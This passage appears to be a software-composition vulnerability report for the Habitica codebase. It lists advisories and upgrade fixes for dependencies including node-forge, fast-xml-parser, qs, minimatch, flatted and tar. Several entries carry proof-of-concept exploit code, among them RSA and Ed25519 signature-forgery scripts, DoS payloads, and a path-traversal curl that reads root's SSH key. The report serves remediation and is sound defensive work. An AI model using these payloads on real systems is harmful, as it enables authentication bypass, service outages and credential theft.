Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › is-svg@4.4.0 › fast-xml-parser@4.5.6
Overview
fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries
Affected versions of this package are vulnerable to XML Entity Expansion in the replaceEntitiesValue() function, which doesn't protect unlimited expansion of numeric entities the way it does DOCTYPE data (as described and fixed for CVE-2026-26278). An attacker can exhaust system memory and CPU resources by submitting XML input containing a large number of numeric character references - &#NNN; and &#xHH;.
Note: This is a bypass for the fix to the DOCTYPE expansion vulnerability in 5.3.6.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade fast-xml-parser to version 5.5.6 or higher.
References
high severity
new
- Vulnerable module: flatted
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › flatted@2.0.2
Overview
Affected versions of this package are vulnerable to Uncontrolled Recursion via the parse function due to using a recursive revive() phase to resolve circular references in deserialized JSON. An attacker can cause a stack overflow and crash the process by supplying a crafted payload with deeply nested or self-referential indices.
PoC
const flatted = require('flatted');
// Build deeply nested circular reference chain
const depth = 20000;
const arr = new Array(depth + 1);
arr[0] = '{"a":"1"}';
for (let i = 1; i <= depth; i++) {
arr[i] = `{"a":"${i + 1}"}`;
}
arr[depth] = '{"a":"leaf"}';
const payload = JSON.stringify(arr);
flatted.parse(payload); // RangeError: Maximum call stack size exceeded
Remediation
Upgrade flatted to version 3.4.0 or higher.
References
high severity
- Vulnerable module: minimatch
- Introduced through: gulp.spritesmith@6.13.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › minimatch@3.0.8
Overview
minimatch is a minimal matching utility.
Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity via the matchOne function. An attacker can cause significant delays in processing and stall the event loop by supplying specially crafted glob patterns containing multiple non-adjacent GLOBSTAR segments.
Remediation
Upgrade minimatch to version 3.1.3, 4.2.5, 5.1.8, 6.2.2, 7.4.8, 8.0.6, 9.0.7, 10.2.3 or higher.
References
high severity
- Vulnerable module: minimatch
- Introduced through: gulp.spritesmith@6.13.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › minimatch@3.0.8
Overview
minimatch is a minimal matching utility.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the AST class, caused by catastrophic backtracking when an input string contains many * characters in a row, followed by an unmatched character.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade minimatch to version 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, 9.0.6, 10.2.1 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the ed25519.verify function. An attacker can bypass authentication and authorization logic by submitting forged non-canonical signatures where the scalar S is not properly validated, allowing acceptance of signatures that should be rejected according to the specification.
PoC
#!/usr/bin/env node
'use strict';
const path = require('path');
const crypto = require('crypto');
const forge = require('./forge');
const ed = forge.ed25519;
const MESSAGE = Buffer.from('dderpym is the coolest man alive!');
// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).
const ED25519_ORDER_L = Buffer.from([
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
]);
// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.
// This returns a new signature with s := s + L (mod 2^256), plus the carry.
function addLToS(signature) {
if (!Buffer.isBuffer(signature) || signature.length !== 64) {
throw new Error('signature must be a 64-byte Buffer');
}
const out = Buffer.from(signature);
let carry = 0;
for (let i = 0; i < 32; i++) {
const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.
const sum = out[idx] + ED25519_ORDER_L[i] + carry;
out[idx] = sum & 0xff;
carry = sum >> 8;
}
return { sig: out, carry };
}
function toSpkiPem(publicKeyBytes) {
if (publicKeyBytes.length !== 32) {
throw new Error('publicKeyBytes must be 32 bytes');
}
// Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.
const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);
const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);
const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);
const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);
const b64 = spki.toString('base64').match(/.{1,64}/g).join('\n');
return `-----BEGIN PUBLIC KEY-----\n${b64}\n-----END PUBLIC KEY-----\n`;
}
function verifyWithCrypto(publicKey, message, signature) {
try {
const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));
const ok = crypto.verify(null, message, keyObject, signature);
return { ok };
} catch (error) {
return { ok: false, error: error.message };
}
}
function toResult(label, original, tweaked) {
return {
[label]: {
original_valid: original.ok,
tweaked_valid: tweaked.ok,
},
};
}
function main() {
const kp = ed.generateKeyPair();
const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });
const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });
const tweaked = addLToS(sig);
const okTweaked = ed.verify({
message: MESSAGE,
signature: tweaked.sig,
publicKey: kp.publicKey,
});
const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);
const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);
const result = {
...toResult('forge', { ok }, { ok: okTweaked }),
...toResult('crypto', cryptoOriginal, cryptoTweaked),
};
console.log(JSON.stringify(result, null, 2));
}
main();
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in ASN.1 structures during RSA signature verification. An attacker can bypass signature verification and inject forged signatures by crafting ASN.1 data with extra fields or insufficient padding, allowing unauthorized actions or data integrity violations.
Note:
This is only exploitable if the default verification scheme (RSASSA-PKCS1-v1_5) is used with the _parseAllDigestBytes: true setting (which is the default).
PoC
#!/usr/bin/env node
'use strict';
const crypto = require('crypto');
const forge = require('./forge/lib/index');
// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
// SEQUENCE {
// SEQUENCE { OID sha256, NULL },
// OCTET STRING <32-byte digest>
// }
// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
const DIGESTINFO_SHA256_PREFIX = Buffer.from(
'300d060960864801650304020105000420',
'hex'
);
const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
function toBuf(n, len) {
let h = n.toString(16);
if (h.length % 2) h = '0' + h;
const b = Buffer.from(h, 'hex');
return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
}
function cbrtFloor(n) {
let lo = 0n;
let hi = 1n;
while (hi * hi * hi <= n) hi <<= 1n;
while (lo + 1n < hi) {
const mid = (lo + hi) >> 1n;
if (mid * mid * mid <= n) lo = mid;
else hi = mid;
}
return lo;
}
const cbrtCeil = n => {
const f = cbrtFloor(n);
return f * f * f === n ? f : f + 1n;
};
function derLen(len) {
if (len < 0x80) return Buffer.from([len]);
if (len <= 0xff) return Buffer.from([0x81, len]);
return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
}
function forgeStrictVerify(publicPem, msg, sig) {
const key = forge.pki.publicKeyFromPem(publicPem);
const md = forge.md.sha256.create();
md.update(msg.toString('utf8'), 'utf8');
try {
// verify(digestBytes, signatureBytes, scheme, options):
// - digestBytes: raw SHA-256 digest bytes for `msg`
// - signatureBytes: binary-string representation of the candidate signature
// - scheme: undefined => default RSASSA-PKCS1-v1_5
// - options._parseAllDigestBytes: require DER parser to consume all bytes
// (this is forge's default for verify; set explicitly here for clarity)
return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
} catch (err) {
return { ok: false, err: err.message };
}
}
function main() {
const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
modulusLength: 4096,
publicExponent: 3,
privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
});
const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
const nBytes = Buffer.from(jwk.n, 'base64url');
const n = toBig(nBytes);
const e = toBig(Buffer.from(jwk.e, 'base64url'));
if (e !== 3n) throw new Error('expected e=3');
const msg = Buffer.from('forged-message-0', 'utf8');
const digest = crypto.createHash('sha256').update(msg).digest();
const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);
// Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
const k = nBytes.length;
// ffCount can be set to any value at or below 111 and produce a valid signature.
// ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
// However, current versions of node forge do not check for this.
// Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
const ffCount = 0;
// `garbageLen` affects DER length field sizes, which in turn affect how
// many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
// A small cap (8) is enough here: DER length-size transitions are discrete
// and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
let garbageLen = 0;
for (let i = 0; i < 8; i += 1) {
const gLenEnc = derLen(garbageLen).length;
const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
const seqLenEnc = derLen(seqLen).length;
const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
const next = k - fixed;
if (next === garbageLen) break;
garbageLen = next;
}
const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
const prefix = Buffer.concat([
Buffer.from([0x00, 0x01]),
Buffer.alloc(ffCount, 0xff),
Buffer.from([0x00]),
Buffer.from([0x30]), derLen(seqLen),
algAndDigest,
Buffer.from([0x04]), derLen(garbageLen)
]);
// Build the numeric interval of all EM values that start with `prefix`:
// - `low` = prefix || 00..00
// - `high` = one past (prefix || ff..ff)
// Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
const suffixLen = k - prefix.length;
const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
const high = low + (1n << BigInt(8 * suffixLen));
const s = cbrtCeil(low);
if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');
const sig = toBuf(s, k);
const controlMsg = Buffer.from('control-message', 'utf8');
const controlSig = crypto.sign('sha256', controlMsg, {
key: privateKey,
padding: crypto.constants.RSA_PKCS1_PADDING
});
// forge verification calls (library under test)
const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
const forgedForge = forgeStrictVerify(publicKey, msg, sig);
// Node.js verification calls (OpenSSL-backed reference behavior)
const controlNode = crypto.verify('sha256', controlMsg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, controlSig);
const forgedNode = crypto.verify('sha256', msg, {
key: publicKey,
padding: crypto.constants.RSA_PKCS1_PADDING
}, sig);
console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
console.log('control-node:', controlNode);
console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
console.log('forgery (node/OpenSSL):', forgedNode);
}
main();
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Infinite loop via the modInverse function. An attacker can cause the application to hang indefinitely and consume excessive CPU resources by supplying a zero value as input, resulting in an infinite loop.
PoC
'use strict';
const { spawnSync } = require('child_process');
const childCode = `
const forge = require('node-forge');
// jsbn may not be auto-loaded; try explicit require if needed
if (!forge.jsbn) {
try { require('node-forge/lib/jsbn'); } catch(e) {}
}
if (!forge.jsbn || !forge.jsbn.BigInteger) {
console.error('ERROR: forge.jsbn.BigInteger not available');
process.exit(2);
}
const BigInteger = forge.jsbn.BigInteger;
const zero = new BigInteger('0', 10);
const mod = new BigInteger('3', 10);
// This call should throw or return 0, but instead loops forever
const inv = zero.modInverse(mod);
console.log('returned: ' + inv.toString());
`;
console.log('[*] Testing: BigInteger(0).modInverse(3)');
console.log('[*] Expected: throw an error or return quickly');
console.log('[*] Spawning child process with 5s timeout...');
console.log();
const result = spawnSync(process.execPath, ['-e', childCode], {
encoding: 'utf8',
timeout: 5000,
});
if (result.error && result.error.code === 'ETIMEDOUT') {
console.log('[VULNERABLE] Child process timed out after 5s');
console.log(' -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');
process.exit(0);
}
if (result.status === 2) {
console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());
console.log(' -> Check your node-forge installation');
process.exit(1);
}
if (result.status === 0) {
console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());
process.exit(1);
}
console.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');
if (result.stderr) console.log(' stderr:', result.stderr.trim());
process.exit(1);
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Uncontrolled Recursion via the fromDer function in asn1.js, which lacks recursion depth. An attacker can cause stack exhaustion and disrupt service availability by submitting specially crafted, deeply nested DER-encoded ASN.1 data.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
high severity
- Vulnerable module: qs
- Introduced through: amazon-payments@0.2.9, in-app-purchase@1.11.4 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › qs@6.5.5
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › qs@6.5.5
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › qs@6.5.5
Overview
qs is a querystring parser that supports nesting and arrays, with a depth limit.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via improper enforcement of the arrayLimit option in bracket notation parsing. An attacker can exhaust server memory and cause application unavailability by submitting a large number of bracket notation parameters - like a[]=1&a[]=2 - in a single HTTP request.
PoC
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Remediation
Upgrade qs to version 6.14.1 or higher.
References
high severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service.
PoC
Input;
const validator = require('validator');
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 3? ${validator.isLength('test', { max: 3 })}`);
console.log(`Is "test" (String.length: ${'test'.length}) length less than or equal to 4? ${validator.isLength('test', { max: 4 })}`);
console.log(`Is "test\uFE0F\uFE0F\uFE0F\uFE0F" (String.length: ${'test\uFE0F\uFE0F\uFE0F\uFE0F'.length}) length less than or equal to 4? ${validator.isLength('test\uFE0F\uFE0F\uFE0F', { max: 4 })}`);
Output:
Is "test" (String.length: 4) length less than or equal to 3? false
Is "test" (String.length: 4) length less than or equal to 4? true
Is "test️️️️" (String.length: 8) length less than or equal to 4? true
Remediation
Upgrade validator to version 13.15.22 or higher.
References
high severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Prototype Pollution through the copy() function in dom.js. Exploiting this vulnerability is possible via the p variable.
DISPUTED This vulnerability has been disputed by the maintainers of the package. Currently the only viable exploit that has been demonstrated is to pollute the target object (rather then the global object which is generally the case for Prototype Pollution vulnerabilities) and it is yet unclear if this limited attack vector exposes any vulnerability in the context of this package.
See the linked GitHub Issue for full details on the discussion around the legitimacy and potential revocation of this vulnerability.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
There is no fixed version for xmldom.
References
high severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Directory Traversal via the extract() function. An attacker can read or write files outside the intended extraction directory by causing the application to extract a malicious archive containing a chain of symlinks leading to a hardlink, which bypasses path validation checks.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.8 or higher.
References
high severity
new
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the Http2Sessions.getSession() function in the HTTP/2 session cleanup. An attacker can cause the client process to crash by establishing multiple concurrent HTTP/2 sessions and then closing all sessions simultaneously from a malicious server.
Remediation
Upgrade axios to version 1.13.2 or higher.
References
high severity
new
- Vulnerable module: fast-xml-parser
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › is-svg@4.4.0 › fast-xml-parser@4.5.6
Overview
fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries
Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in the DocTypeReader component when the maxEntityCount or maxEntitySize configuration options are explicitly set to 0. Due to JavaScript's falsy evaluation, the intended limits are bypassed. An attacker can cause unbounded entity expansion and exhaust server memory by supplying crafted XML input containing numerous large entities.
Note:
This is only exploitable if the application is configured with processEntities enabled and either maxEntityCount or maxEntitySize set to 0.
PoC
const { XMLParser } = require("fast-xml-parser");
// Developer intends: "no entities allowed at all"
const parser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 0, // should mean "zero entities allowed"
maxEntitySize: 0 // should mean "zero-length entities only"
}
});
// Generate XML with many large entities
let entities = "";
for (let i = 0; i < 1000; i++) {
entities += `<!ENTITY e${i} "${"A".repeat(100000)}">`;
}
const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
${entities}
]>
<foo>&e0;</foo>`;
// This should throw "Entity count exceeds maximum" but does not
try {
const result = parser.parse(xml);
console.log("VULNERABLE: parsed without error, entities bypassed limits");
} catch (e) {
console.log("SAFE:", e.message);
}
// Control test: setting maxEntityCount to 1 correctly blocks
const safeParser = new XMLParser({
processEntities: {
enabled: true,
maxEntityCount: 1,
maxEntitySize: 100
}
});
try {
safeParser.parse(xml);
console.log("ERROR: should have thrown");
} catch (e) {
console.log("CONTROL:", e.message); // "Entity count (2) exceeds maximum allowed (1)"
}
Remediation
Upgrade fast-xml-parser to version 5.5.7 or higher.
References
high severity
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
